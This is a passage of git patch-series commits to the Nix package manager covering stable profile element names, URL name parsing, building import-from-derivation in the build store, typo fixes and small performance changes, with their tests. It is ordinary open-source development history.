i); if (element.source) { logger->cout("Flake attribute: %s%s", element.source->attrPath, element.source->outputs.to_string()); logger->cout("Original flake URL: %s", element.source->originalRef.to_string()); diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh index eced4d3f1..618b6241d 100644 --- a/tests/functional/nix-profile.sh +++ b/tests/functional/nix-profile.sh @@ -49,7 +49,7 @@ cp ./config.nix $flake1Dir/ nix-env -f ./user-envs.nix -i foo-1.0 nix profile list | grep -A2 'Name:.*foo' | grep 'Store paths:.*foo-1.0' nix profile install $flake1Dir -L -nix profile list | grep -A4 'Index:.*1' | grep 'Locked flake URL:.*narHash' +nix profile list | grep -A4 'Name:.*flake1' | grep 'Locked flake URL:.*narHash' [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello World" ]] [ -e $TEST_HOME/.nix-profile/share/man ] (! [ -e $TEST_HOME/.nix-profile/include ]) @@ -58,9 +58,8 @@ nix profile history | grep "packages.$system.default: ∅ -> 1.0" nix profile diff-closures | grep 'env-manifest.nix: ε → ∅' # Test XDG Base Directories support - export NIX_CONFIG="use-xdg-base-directories = true" -nix profile remove 1 +nix profile remove flake1 nix profile install $flake1Dir [[ $($TEST_HOME/.local/state/nix/profile/bin/hello) = "Hello World" ]] unset NIX_CONFIG @@ -68,7 +67,7 @@ unset NIX_CONFIG # Test upgrading a package. printf NixOS > $flake1Dir/who printf 2.0 > $flake1Dir/version -nix profile upgrade 1 +nix profile upgrade flake1 [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello NixOS" ]] nix profile history | grep "packages.$system.default: 1.0, 1.0-man -> 2.0, 2.0-man" @@ -89,7 +88,7 @@ nix profile diff-closures | grep 'Version 3 -> 4' # Test installing a non-flake package. nix profile install --file ./simple.nix '' [[ $(cat $TEST_HOME/.nix-profile/hello) = "Hello World!" ]] -nix profile remove 1 +nix profile remove simple nix profile install $(nix-build --no-out-link ./simple.nix) [[ $(cat $TEST_HOME/.nix-profile/hello) = "Hello World!" ]] @@ -107,7 +106,7 @@ nix profile wipe-history # Test upgrade to CA package. printf true > $flake1Dir/ca.nix printf 3.0 > $flake1Dir/version -nix profile upgrade 0 +nix profile upgrade flake1 nix profile history | grep "packages.$system.default: 1.0, 1.0-man -> 3.0, 3.0-man" # Test new install of CA package. From 6268a45b650f563bae2360e0540920a2959bdd40 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 22 Dec 2023 16:11:25 +0100 Subject: [PATCH 172/654] nix profile: Make profile element names stable The profile manifest is now an object keyed on the name returned by getNameFromURL() at installation time, instead of an array. This ensures that the names of profile elements don't change when other elements are added/removed. --- src/nix/profile.cc | 140 ++++++++++++++++---------------- tests/functional/nix-profile.sh | 17 ++-- 2 files changed, 80 insertions(+), 77 deletions(-) diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 517693cd4..8b3918b80 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -45,7 +45,6 @@ const int defaultPriority = 5; struct ProfileElement { StorePathSet storePaths; - std::string name; std::optional source; bool active = true; int priority = defaultPriority; @@ -82,11 +81,6 @@ struct ProfileElement return showVersions(versions); } - bool operator < (const ProfileElement & other) const - { - return std::tuple(identifier(), storePaths) < std::tuple(other.identifier(), other.storePaths); - } - void updateStorePaths( ref evalStore, ref store, @@ -109,7 +103,9 @@ struct ProfileElement struct ProfileManifest { - std::vector elements; + using ProfileElementName = std::string; + + std::map elements; ProfileManifest() { } @@ -119,8 +115,6 @@ struct ProfileManifest if (pathExists(manifestPath)) { auto json = nlohmann::json::parse(readFile(manifestPath)); - /* Keep track of already found names to allow preventing duplicates. */ - std::set foundNames; auto version = json.value("version", 0); std::string sUrl; @@ -131,6 +125,7 @@ struct ProfileManifest sOriginalUrl = "originalUri"; break; case 2: + case 3: sUrl = "url"; sOriginalUrl = "originalUrl"; break; @@ -138,7 +133,9 @@ struct ProfileManifest throw Error("profile manifest '%s' has unsupported version %d", manifestPath, version); } - for (auto & e : json["elements"]) { + auto elems = json["elements"]; + for (auto & elem : elems.items()) { + auto & e = elem.value(); ProfileElement element; for (auto & p : e["storePaths"]) element.storePaths.insert(state.store->parseStorePath((std::string) p)); @@ -155,25 +152,16 @@ struct ProfileManifest }; } - std::string nameCandidate = element.identifier(); - if (e.contains("name")) { - nameCandidate = e["name"]; - } - else if (element.source) { - auto url = parseURL(element.source->to_string()); - auto name = getNameFromURL(url); - if (name) - nameCandidate = *name; - } + std::string name = + elems.is_object() + ? elem.key() + : e.contains("name") + ? (std::string) e["name"] + : element.source + ? getNameFromURL(parseURL(element.source->to_string())).value_or(element.identifier()) + : element.identifier(); - auto finalName = nameCandidate; - for (int i = 1; foundNames.contains(finalName); ++i) { - finalName = nameCandidate + std::to_string(i); - } - element.name = finalName; - foundNames.insert(element.name); - - elements.emplace_back(std::move(element)); + addElement(name, std::move(element)); } } @@ -187,16 +175,34 @@ struct ProfileManifest for (auto & drvInfo : drvInfos) { ProfileElement element; element.storePaths = {drvInfo.queryOutPath()}; - element.name = element.identifier(); - elements.emplace_back(std::move(element)); + addElement(std::move(element)); } } } + void addElement(std::string_view nameCandidate, ProfileElement element) + { + std::string finalName(nameCandidate); + for (int i = 1; elements.contains(finalName); ++i) + finalName = nameCandidate + "-" + std::to_string(i); + + elements.insert_or_assign(finalName, std::move(element)); + } + + void addElement(ProfileElement element) + { + auto name = + element.source + ? getNameFromURL(parseURL(element.source->to_string())) + : std::nullopt; + auto name2 = name ? *name : element.identifier(); + addElement(name2, std::move(element)); + } + nlohmann::json toJSON(Store & store) const { - auto array = nlohmann::json::array(); - for (auto & element : elements) { + auto es = nlohmann::json::object(); + for (auto & [name, element] : elements) { auto paths = nlohmann::json::array(); for (auto & path : element.storePaths) paths.push_back(store.printStorePath(path)); @@ -210,11 +216,11 @@ struct ProfileManifest obj["attrPath"] = element.source->attrPath; obj["outputs"] = element.source->outputs; } - array.push_back(obj); + es[name] = obj; } nlohmann::json json; - json["version"] = 2; - json["elements"] = array; + json["version"] = 3; + json["elements"] = es; return json; } @@ -225,7 +231,7 @@ struct ProfileManifest StorePathSet references; Packages pkgs; - for (auto & element : elements) { + for (auto & [name, element] : elements) { for (auto & path : element.storePaths) { if (element.active) pkgs.emplace_back(store->printStorePath(path), true, element.priority); @@ -267,33 +273,27 @@ struct ProfileManifest static void printDiff(const ProfileManifest & prev, const ProfileManifest & cur, std::string_view indent) { - auto prevElems = prev.elements; - std::sort(prevElems.begin(), prevElems.end()); - - auto curElems = cur.elements; - std::sort(curElems.begin(), curElems.end()); - - auto i = prevElems.begin(); - auto j = curElems.begin(); + auto i = prev.elements.begin(); + auto j = cur.elements.begin(); bool changes = false; - while (i != prevElems.end() || j != curElems.end()) { - if (j != curElems.end() && (i == prevElems.end() || i->identifier() > j->identifier())) { - logger->cout("%s%s: ∅ -> %s", indent, j->identifier(), j->versions()); + while (i != prev.elements.end() || j != cur.elements.end()) { + if (j != cur.elements.end() && (i == prev.elements.end() || i->first > j->first)) { + logger->cout("%s%s: ∅ -> %s", indent, j->second.identifier(), j->second.versions()); changes = true; ++j; } - else if (i != prevElems.end() && (j == curElems.end() || i->identifier() < j->identifier())) { - logger->cout("%s%s: %s -> ∅", indent, i->identifier(), i->versions()); + else if (i != prev.elements.end() && (j == cur.elements.end() || i->first < j->first)) { + logger->cout("%s%s: %s -> ∅", indent, i->second.identifier(), i->second.versions()); changes = true; ++i; } else { - auto v1 = i->versions(); - auto v2 = j->versions(); + auto v1 = i->second.versions(); + auto v2 = j->second.versions(); if (v1 != v2) { - logger->cout("%s%s: %s -> %s", indent, i->identifier(), v1, v2); + logger->cout("%s%s: %s -> %s", indent, i->second.identifier(), v1, v2); changes = true; } ++i; @@ -392,7 +392,7 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile element.updateStorePaths(getEvalStore(), store, res); - manifest.elements.push_back(std::move(element)); + manifest.addElement(std::move(element)); } try { @@ -402,7 +402,7 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile // See https://github.com/NixOS/nix/compare/3efa476c5439f8f6c1968a6ba20a31d1239c2f04..1fe5d172ece51a619e879c4b86f603d9495cc102 auto findRefByFilePath = [&](Iterator begin, Iterator end) { for (auto it = begin; it != end; it++) { - auto profileElement = *it; + auto & profileElement = it->second; for (auto & storePath : profileElement.storePaths) { if (conflictError.fileA.starts_with(store->printStorePath(storePath))) { return std::pair(conflictError.fileA, profileElement.toInstallables(*store)); @@ -488,13 +488,17 @@ public: return res; } - bool matches(const Store & store, const ProfileElement & element, const std::vector & matchers) + bool matches( + const Store & store, + const std::string & name, + const ProfileElement & element, + const std::vector & matchers) { for (auto & matcher : matchers) { if (auto path = std::get_if(&matcher)) { if (element.storePaths.count(store.parseStorePath(*path))) return true; } else if (auto regex = std::get_if(&matcher)) { - if (std::regex_match(element.name, regex->reg)) + if (std::regex_match(name, regex->reg)) return true; } } @@ -525,10 +529,9 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem ProfileManifest newManifest; - for (size_t i = 0; i < oldManifest.elements.size(); ++i) { - auto & element(oldManifest.elements[i]); - if (!matches(*store, element, matchers)) { - newManifest.elements.push_back(std::move(element)); + for (auto & [name, element] : oldManifest.elements) { + if (!matches(*store, name, element, matchers)) { + newManifest.elements.insert_or_assign(name, std::move(element)); } else { notice("removing '%s'", element.identifier()); } @@ -574,14 +577,13 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf auto matchers = getMatchers(store); Installables installables; - std::vector indices; + std::vector elems; auto matchedCount = 0; auto upgradedCount = 0; - for (size_t i = 0; i < manifest.elements.size(); ++i) { - auto & element(manifest.elements[i]); - if (!matches(*store, element, matchers)) { + for (auto & [name, element] : manifest.elements) { + if (!matches(*store, name, element, matchers)) { continue; } @@ -637,7 +639,7 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf }; installables.push_back(installable); - indices.push_back(i); + elems.push_back(&element); } if (upgradedCount == 0) { @@ -661,7 +663,7 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf for (size_t i = 0; i < installables.size(); ++i) { auto & installable = installables.at(i); - auto & element = manifest.elements[indices.at(i)]; + auto & element = *elems.at(i); element.updateStorePaths( getEvalStore(), store, @@ -693,11 +695,11 @@ struct CmdProfileList : virtual EvalCommand, virtual StoreCommand, MixDefaultPro if (json) { std::cout << manifest.toJSON(*store).dump() << "\n"; } else { - for (size_t i = 0; i < manifest.elements.size(); ++i) { - auto & element(manifest.elements[i]); + for (const auto & [i, e] : enumerate(manifest.elements)) { + auto & [name, element] = e; if (i) logger->cout(""); logger->cout("Name: " ANSI_BOLD "%s" ANSI_NORMAL "%s", - element.name, + name, element.active ? "" : " " ANSI_RED "(inactive)" ANSI_NORMAL); if (element.source) { logger->cout("Flake attribute: %s%s", element.source->attrPath, element.source->outputs.to_string()); diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh index 618b6241d..003af5174 100644 --- a/tests/functional/nix-profile.sh +++ b/tests/functional/nix-profile.sh @@ -59,7 +59,7 @@ nix profile diff-closures | grep 'env-manifest.nix: ε → ∅' # Test XDG Base Directories support export NIX_CONFIG="use-xdg-base-directories = true" -nix profile remove flake1 +nix profile remove flake1 2>&1 | grep 'removed 1 packages' nix profile install $flake1Dir [[ $($TEST_HOME/.local/state/nix/profile/bin/hello) = "Hello World" ]] unset NIX_CONFIG @@ -80,7 +80,7 @@ nix profile rollback # Test uninstall. [ -e $TEST_HOME/.nix-profile/bin/foo ] -nix profile remove foo +nix profile remove foo 2>&1 | grep 'removed 1 packages' (! [ -e $TEST_HOME/.nix-profile/bin/foo ]) nix profile history | grep 'foo: 1.0 -> ∅' nix profile diff-closures | grep 'Version 3 -> 4' @@ -88,7 +88,7 @@ nix profile diff-closures | grep 'Version 3 -> 4' # Test installing a non-flake package. nix profile install --file ./simple.nix '' [[ $(cat $TEST_HOME/.nix-profile/hello) = "Hello World!" ]] -nix profile remove simple +nix profile remove simple 2>&1 | grep 'removed 1 packages' nix profile install $(nix-build --no-out-link ./simple.nix) [[ $(cat $TEST_HOME/.nix-profile/hello) = "Hello World!" ]] @@ -96,8 +96,9 @@ nix profile install $(nix-build --no-out-link ./simple.nix) mkdir $TEST_ROOT/simple-too cp ./simple.nix ./config.nix simple.builder.sh $TEST_ROOT/simple-too nix profile install --file $TEST_ROOT/simple-too/simple.nix '' -nix profile list | grep -A4 'Name:.*simple' | grep 'Name:.*simple1' -nix profile remove simple1 +nix profile list | grep -A4 'Name:.*simple' | grep 'Name:.*simple-1' +nix profile remove simple 2>&1 | grep 'removed 1 packages' +nix profile remove simple-1 2>&1 | grep 'removed 1 packages' # Test wipe-history. nix profile wipe-history @@ -110,7 +111,7 @@ nix profile upgrade flake1 nix profile history | grep "packages.$system.default: 1.0, 1.0-man -> 3.0, 3.0-man" # Test new install of CA package. -nix profile remove flake1 +nix profile remove flake1 2>&1 | grep 'removed 1 packages' printf 4.0 > $flake1Dir/version printf Utrecht > $flake1Dir/who nix profile install $flake1Dir @@ -131,14 +132,14 @@ nix profile upgrade flake1 [ -e $TEST_HOME/.nix-profile/share/man ] [ -e $TEST_HOME/.nix-profile/include ] -nix profile remove flake1 +nix profile remove flake1 2>&1 | grep 'removed 1 packages' nix profile install "$flake1Dir^man" (! [ -e $TEST_HOME/.nix-profile/bin/hello ]) [ -e $TEST_HOME/.nix-profile/share/man ] (! [ -e $TEST_HOME/.nix-profile/include ]) # test priority -nix profile remove flake1 +nix profile remove flake1 2>&1 | grep 'removed 1 packages' # Make another flake. flake2Dir=$TEST_ROOT/flake2 From a748e88bf4cca0fdc6ce75188e88017a7899d16b Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 22 Dec 2023 16:27:31 +0100 Subject: [PATCH 173/654] nix profile: Remove check for "name" attribute in manifests AFAIK, we've never emitted this attribute. --- src/nix/profile.cc | 2 -- 1 file changed, 2 deletions(-) diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 8b3918b80..1b0c333bd 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -155,8 +155,6 @@ struct ProfileManifest std::string name = elems.is_object() ? elem.key() - : e.contains("name") - ? (std::string) e["name"] : element.source ? getNameFromURL(parseURL(element.source->to_string())).value_or(element.identifier()) : element.identifier(); From 936a3642264ac159f3f9093710be3465b70e0e89 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 22 Dec 2023 16:35:58 +0100 Subject: [PATCH 174/654] getNameFromURL(): Support uppercase characters in attribute names In particular, this makes it handle 'legacyPackages' correctly. --- src/libexpr/flake/url-name.cc | 2 +- tests/unit/libexpr/flake/url-name.cc | 8 +++++--- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/src/libexpr/flake/url-name.cc b/src/libexpr/flake/url-name.cc index 7e51aa2e1..753f197d5 100644 --- a/src/libexpr/flake/url-name.cc +++ b/src/libexpr/flake/url-name.cc @@ -4,7 +4,7 @@ namespace nix { -static const std::string attributeNamePattern("[a-z0-9_-]+"); +static const std::string attributeNamePattern("[a-zA-Z0-9_-]+"); static const std::regex lastAttributeRegex("(?:" + attributeNamePattern + "\\.)*(?!default)(" + attributeNamePattern +")(\\^.*)?"); static const std::string pathSegmentPattern("[a-zA-Z0-9_-]+"); static const std::regex lastPathSegmentRegex(".*/(" + pathSegmentPattern +")"); diff --git a/tests/unit/libexpr/flake/url-name.cc b/tests/unit/libexpr/flake/url-name.cc index 84d32837c..85387b323 100644 --- a/tests/unit/libexpr/flake/url-name.cc +++ b/tests/unit/libexpr/flake/url-name.cc @@ -5,11 +5,13 @@ namespace nix { /* ----------- tests for url-name.hh --------------------------------------------------*/ - TEST(getNameFromURL, getsNameFromURL) { + TEST(getNameFromURL, getNameFromURL) { ASSERT_EQ(getNameFromURL(parseURL("path:/home/user/project")), "project"); ASSERT_EQ(getNameFromURL(parseURL("path:~/repos/nixpkgs#packages.x86_64-linux.hello")), "hello"); - ASSERT_EQ(getNameFromURL(parseURL("path:.#nonStandardAttr.mylaptop")), "nonStandardAttr.mylaptop"); - ASSERT_EQ(getNameFromURL(parseURL("path:./repos/myflake#nonStandardAttr.mylaptop")), "nonStandardAttr.mylaptop"); + ASSERT_EQ(getNameFromURL(parseURL("path:~/repos/nixpkgs#legacyPackages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("path:~/repos/nixpkgs#packages.x86_64-linux.Hello")), "Hello"); + ASSERT_EQ(getNameFromURL(parseURL("path:.#nonStandardAttr.mylaptop")), "mylaptop"); + ASSERT_EQ(getNameFromURL(parseURL("path:./repos/myflake#nonStandardAttr.mylaptop")), "mylaptop"); ASSERT_EQ(getNameFromURL(parseURL("path:./nixpkgs#packages.x86_64-linux.complex^bin,man")), "complex"); ASSERT_EQ(getNameFromURL(parseURL("path:./myproj#packages.x86_64-linux.default^*")), "myproj"); From 9cb287657bec5a969d8bb1678d598d9fa820e60b Mon Sep 17 00:00:00 2001 From: Shea Levy Date: Sat, 23 Dec 2023 17:15:09 -0500 Subject: [PATCH 175/654] remote-store test: Break out IFD expression into a separate file --- tests/functional/ifd.nix | 10 ++++++++++ tests/functional/remote-store.sh | 13 +------------ 2 files changed, 11 insertions(+), 12 deletions(-) create mode 100644 tests/functional/ifd.nix diff --git a/tests/functional/ifd.nix b/tests/functional/ifd.nix new file mode 100644 index 000000000..d0b9b54ad --- /dev/null +++ b/tests/functional/ifd.nix @@ -0,0 +1,10 @@ +with import ./config.nix; +import ( + mkDerivation { + name = "foo"; + bla = import ./dependencies.nix {}; + buildCommand = " + echo \\\"hi\\\" > $out + "; + } +) diff --git a/tests/functional/remote-store.sh b/tests/functional/remote-store.sh index 5c7bfde46..dc80f8b55 100644 --- a/tests/functional/remote-store.sh +++ b/tests/functional/remote-store.sh @@ -19,18 +19,7 @@ else fi # Test import-from-derivation through the daemon. -[[ $(nix eval --impure --raw --expr ' - with import ./config.nix; - import ( - mkDerivation { - name = "foo"; - bla = import ./dependencies.nix {}; - buildCommand = " - echo \\\"hi\\\" > $out - "; - } - ) -') = hi ]] +[[ $(nix eval --impure --raw --file ./ifd.nix) = hi ]] storeCleared=1 NIX_REMOTE_=$NIX_REMOTE $SHELL ./user-envs.sh From c3942ef85ffbd83391410fbf012f1de366d2463c Mon Sep 17 00:00:00 2001 From: Shea Levy Date: Sat, 23 Dec 2023 21:26:12 -0500 Subject: [PATCH 176/654] Build IFD in the build store when using eval-store. Previously, IFDs would be built within the eval store, even though one is typically using `--eval-store` precisely to *avoid* local builds. Because the resulting Nix expression must be copied back to the eval store in order to be imported, this requires the eval store to trust the build store's signatures. --- doc/manual/rl-next/ifd-eval-store.md | 8 ++++++++ src/libexpr/primops.cc | 19 +++++++++++++------ tests/functional/eval-store.sh | 8 ++++++++ 3 files changed, 29 insertions(+), 6 deletions(-) create mode 100644 doc/manual/rl-next/ifd-eval-store.md diff --git a/doc/manual/rl-next/ifd-eval-store.md b/doc/manual/rl-next/ifd-eval-store.md new file mode 100644 index 000000000..835e7e7a3 --- /dev/null +++ b/doc/manual/rl-next/ifd-eval-store.md @@ -0,0 +1,8 @@ +--- +synopsis: import-from-derivation builds the derivation in the build store +prs: 9661 +--- + +When using `--eval-store`, `import`ing from a derivation will now result in the derivation being built on the build store, i.e. the store specified in the `store` Nix option. + +Because the resulting Nix expression must be copied back to the eval store in order to be imported, this requires the eval store to trust the build store's signatures. diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index a1502da45..58826b3bd 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -84,14 +84,14 @@ StringMap EvalState::realiseContext(const NixStringContext & context) /* Build/substitute the context. */ std::vector buildReqs; for (auto & d : drvs) buildReqs.emplace_back(DerivedPath { d }); - store->buildPaths(buildReqs); + buildStore->buildPaths(buildReqs, bmNormal, store); + + StorePathSet outputsToCopyAndAllow; for (auto & drv : drvs) { - auto outputs = resolveDerivedPath(*store, drv); + auto outputs = resolveDerivedPath(*buildStore, drv, &*store); for (auto & [outputName, outputPath] : outputs) { - /* Add the output of this derivations to the allowed - paths. */ - allowPath(store->toRealPath(outputPath)); + outputsToCopyAndAllow.insert(outputPath); /* Get all the output paths corresponding to the placeholders we had */ if (experimentalFeatureSettings.isEnabled(Xp::CaDerivations)) { @@ -101,12 +101,19 @@ StringMap EvalState::realiseContext(const NixStringContext & context) .drvPath = drv.drvPath, .output = outputName, }).render(), - store->printStorePath(outputPath) + buildStore->printStorePath(outputPath) ); } } } + if (store != buildStore) copyClosure(*buildStore, *store, outputsToCopyAndAllow); + for (auto & outputPath : outputsToCopyAndAllow) { + /* Add the output of this derivations to the allowed + paths. */ + allowPath(store->toRealPath(outputPath)); + } + return res; } diff --git a/tests/functional/eval-store.sh b/tests/functional/eval-store.sh index ec99fd953..9937ecbce 100644 --- a/tests/functional/eval-store.sh +++ b/tests/functional/eval-store.sh @@ -40,3 +40,11 @@ if [[ ! -n "${NIX_TESTS_CA_BY_DEFAULT:-}" ]]; then (! ls $NIX_STORE_DIR/*.drv) fi ls $eval_store/nix/store/*.drv + +clearStore +rm -rf "$eval_store" + +# Confirm that import-from-derivation builds on the build store +[[ $(nix eval --eval-store "$eval_store?require-sigs=false" --impure --raw --file ./ifd.nix) = hi ]] +ls $NIX_STORE_DIR/*dependencies-top/foobar +(! ls $eval_store/nix/store/*dependencies-top/foobar) From e2399fc94935c9bc1ae6670c5d445214e039ac84 Mon Sep 17 00:00:00 2001 From: Brian Le Date: Tue, 26 Dec 2023 17:12:28 -0500 Subject: [PATCH 177/654] Change "dervation" typos to "derivation" --- doc/manual/src/language/derivations.md | 2 +- src/libstore/remote-store.cc | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/language/derivations.md b/doc/manual/src/language/derivations.md index 2aded5527..cbb30d074 100644 --- a/doc/manual/src/language/derivations.md +++ b/doc/manual/src/language/derivations.md @@ -274,7 +274,7 @@ The [`builder`](#attr-builder) is executed as follows: directory (typically, `/nix/store`). - `NIX_ATTRS_JSON_FILE` & `NIX_ATTRS_SH_FILE` if `__structuredAttrs` - is set to `true` for the dervation. A detailed explanation of this + is set to `true` for the derivation. A detailed explanation of this behavior can be found in the [section about structured attrs](./advanced-attributes.md#adv-attr-structuredAttrs). diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index 4d0113594..f0df646ca 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -186,7 +186,7 @@ void RemoteStore::ConnectionHandle::processStderr(Sink * sink, Source * source, if (m.find("parsing derivation") != std::string::npos && m.find("expected string") != std::string::npos && m.find("Derive([") != std::string::npos) - throw Error("%s, this might be because the daemon is too old to understand dependencies on dynamic derivations. Check to see if the raw dervation is in the form '%s'", std::move(m), "DrvWithVersion(..)"); + throw Error("%s, this might be because the daemon is too old to understand dependencies on dynamic derivations. Check to see if the raw derivation is in the form '%s'", std::move(m), "DrvWithVersion(..)"); } throw; } From b6313f64f7be11e0fe74b17cb31dbbf12b2e7725 Mon Sep 17 00:00:00 2001 From: DavHau Date: Wed, 27 Dec 2023 19:57:27 +0700 Subject: [PATCH 178/654] saner default for log-lines: change to 25 This seems to be a much saner default. 10 lines are just not enough in so many cases. --- src/libstore/globals.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index b35dc37a1..c12998f8e 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -144,7 +144,7 @@ public: */ bool verboseBuild = true; - Setting logLines{this, 10, "log-lines", + Setting logLines{this, 25, "log-lines", "The number of lines of the tail of " "the log to show if a build fails."}; From 99a691c8a1abffd30077bd5f005cb8d4bbafae5c Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 24 Dec 2023 21:14:08 +0100 Subject: [PATCH 179/654] don't use istreams in hot paths MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit istream sentry objects are very expensive for single-character operations, and since we don't configure exception masks for the istreams used here they don't even do anything. all we need is end-of-string checks and an advancing position in an immutable memory buffer, both of which can be had for much cheaper than istreams allow. the effect of this change is most apparent on empty stores. before: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 7.167 s ± 0.013 s [User: 5.528 s, System: 1.431 s] Range (min … max): 7.147 s … 7.182 s 10 runs after: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.963 s ± 0.011 s [User: 5.330 s, System: 1.421 s] Range (min … max): 6.943 s … 6.974 s 10 runs --- src/libstore/derivations.cc | 47 +++++++++++++++++++++++++++---------- 1 file changed, 34 insertions(+), 13 deletions(-) diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index 8a7d660ff..973ce5211 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -154,18 +154,39 @@ StorePath writeDerivation(Store & store, } -/* Read string `s' from stream `str'. */ -static void expect(std::istream & str, std::string_view s) -{ - for (auto & c : s) { - if (str.get() != c) - throw FormatError("expected string '%1%'", s); +namespace { +/** + * This mimics std::istream to some extent. We use this much smaller implementation + * instead of plain istreams because the sentry object overhead is too high. + */ +struct StringViewStream { + std::string_view remaining; + + int peek() const { + return remaining.empty() ? EOF : remaining[0]; } + + int get() { + if (remaining.empty()) return EOF; + char c = remaining[0]; + remaining.remove_prefix(1); + return c; + } +}; +} + + +/* Read string `s' from stream `str'. */ +static void expect(StringViewStream & str, std::string_view s) +{ + if (!str.remaining.starts_with(s)) + throw FormatError("expected string '%1%'", s); + str.remaining.remove_prefix(s.size()); } /* Read a C-style string from stream `str'. */ -static std::string parseString(std::istream & str) +static std::string parseString(StringViewStream & str) { std::string res; expect(str, "\""); @@ -187,7 +208,7 @@ static void validatePath(std::string_view s) { throw FormatError("bad path '%1%' in derivation", s); } -static Path parsePath(std::istream & str) +static Path parsePath(StringViewStream & str) { auto s = parseString(str); validatePath(s); @@ -195,7 +216,7 @@ static Path parsePath(std::istream & str) } -static bool endOfList(std::istream & str) +static bool endOfList(StringViewStream & str) { if (str.peek() == ',') { str.get(); @@ -209,7 +230,7 @@ static bool endOfList(std::istream & str) } -static StringSet parseStrings(std::istream & str, bool arePaths) +static StringSet parseStrings(StringViewStream & str, bool arePaths) { StringSet res; expect(str, "["); @@ -267,7 +288,7 @@ static DerivationOutput parseDerivationOutput( } static DerivationOutput parseDerivationOutput( - const StoreDirConfig & store, std::istringstream & str, + const StoreDirConfig & store, StringViewStream & str, const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings) { expect(str, ","); const auto pathS = parseString(str); @@ -297,7 +318,7 @@ enum struct DerivationATermVersion { static DerivedPathMap::ChildNode parseDerivedPathMapNode( const StoreDirConfig & store, - std::istringstream & str, + StringViewStream & str, DerivationATermVersion version) { DerivedPathMap::ChildNode node; @@ -349,7 +370,7 @@ Derivation parseDerivation( Derivation drv; drv.name = name; - std::istringstream str(std::move(s)); + StringViewStream str{s}; expect(str, "D"); DerivationATermVersion version; switch (str.peek()) { From 2cfc4ace35d1c8cca917c487be3cfddfcf3bba01 Mon Sep 17 00:00:00 2001 From: pennae Date: Tue, 26 Dec 2023 17:40:55 +0100 Subject: [PATCH 180/654] malloc/memset even less MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit more buffers that can be uninitialized and on the stack. small difference, but still worth doing. before: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.963 s ± 0.011 s [User: 5.330 s, System: 1.421 s] Range (min … max): 6.943 s … 6.974 s 10 runs after: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.952 s ± 0.015 s [User: 5.294 s, System: 1.452 s] Range (min … max): 6.926 s … 6.974 s 10 runs --- src/libutil/archive.cc | 2 +- src/libutil/file-system.cc | 2 +- src/libutil/serialise.cc | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/src/libutil/archive.cc b/src/libutil/archive.cc index 465df2073..712ea51c7 100644 --- a/src/libutil/archive.cc +++ b/src/libutil/archive.cc @@ -140,7 +140,7 @@ static void parseContents(ParseSink & sink, Source & source, const Path & path) sink.preallocateContents(size); uint64_t left = size; - std::vector buf(65536); + std::array buf; while (left) { checkInterrupt(); diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc index c96effff9..4cac35ace 100644 --- a/src/libutil/file-system.cc +++ b/src/libutil/file-system.cc @@ -307,7 +307,7 @@ void writeFile(const Path & path, Source & source, mode_t mode, bool sync) if (!fd) throw SysError("opening file '%1%'", path); - std::vector buf(64 * 1024); + std::array buf; try { while (true) { diff --git a/src/libutil/serialise.cc b/src/libutil/serialise.cc index f465bd0de..76b378e18 100644 --- a/src/libutil/serialise.cc +++ b/src/libutil/serialise.cc @@ -82,7 +82,7 @@ void Source::operator () (std::string_view data) void Source::drainInto(Sink & sink) { std::string s; - std::vector buf(8192); + std::array buf; while (true) { size_t n; try { From 7434caca0545bd6194bb52eebf6fdf0424755eb0 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 15 Dec 2023 11:52:21 -0800 Subject: [PATCH 181/654] Fix segfault on infinite recursion in some cases MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This fixes a segfault on infinite function call recursion (rather than infinite thunk recursion) by tracking the function call depth in `EvalState`. Additionally, to avoid printing extremely long stack traces, stack frames are now deduplicated, with a `(19997 duplicate traces omitted)` message. This should only really be triggered in infinite recursion scenarios. Before: $ 